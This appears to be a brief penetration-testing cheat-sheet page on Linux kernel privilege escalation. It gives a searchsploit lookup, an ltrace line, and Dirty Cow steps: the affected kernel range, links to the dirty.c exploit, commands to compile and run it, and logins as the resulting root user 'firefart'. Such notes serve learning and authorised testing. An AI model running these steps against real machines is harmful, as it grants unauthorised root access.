# Kernel Exploits

{% code title="Search Kernel for Exploits" %}

```sh
searchsploit "Linux Kernel" | grep <version>
```

{% endcode %}

<details>

<summary>a</summary>

{% code title=" Traces library function calls" overflow="wrap" %}

```sh
ltrace ProgramName
```

{% endcode %}

</details>

<details>

<summary><mark style="color:red;"><strong><code>Dirty Cow</code></strong></mark></summary>

* #### <mark style="color:purple;">List of</mark> <mark style="color:orange;">`POCs`</mark> [<mark style="color:purple;">here</mark>](https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs)<mark style="color:purple;">.</mark>
* <mark style="color:purple;">**Linux kernel versions**</mark>**&#x20;**<mark style="color:orange;">**`2.6.22`**</mark>**&#x20;**<mark style="color:purple;">**to**</mark>**&#x20;**<mark style="color:orange;">**`4.8.3`**</mark>**&#x20;**<mark style="color:purple;">**(inclusive)**</mark>\
  [<mark style="color:orange;">**`dirty.c`**</mark>](https://github.com/FireFart/dirtycow/blob/master/dirty.c) <mark style="color:purple;">**POC**</mark>

{% code title="Compile it" %}

```bash
gcc -pthread dirty.c -o dirty -lcrypt; chmod +x dirty; ./dirty
```

{% endcode %}

{% code title="Log as firefart" %}

```bash
su firefart
```

{% endcode %}

```bash
ssh firefart@10.10.10.10
```

</details>